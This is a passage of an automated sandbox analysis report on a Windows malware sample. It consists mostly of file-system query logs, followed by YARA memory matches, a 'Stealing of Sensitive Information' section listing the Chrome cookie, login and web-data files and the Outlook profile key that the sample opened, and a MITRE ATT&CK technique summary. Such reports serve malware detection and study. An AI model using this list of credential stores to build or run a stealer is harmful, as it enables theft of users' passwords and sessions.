            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

            Remote Access Functionality

            Source: Yara match File source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 Shared Modules; At (Windows); Cron; Launchd; Scheduled Task
            Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Privilege Escalation: 612 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 612 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 2 Software Packing
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 221 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 13 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
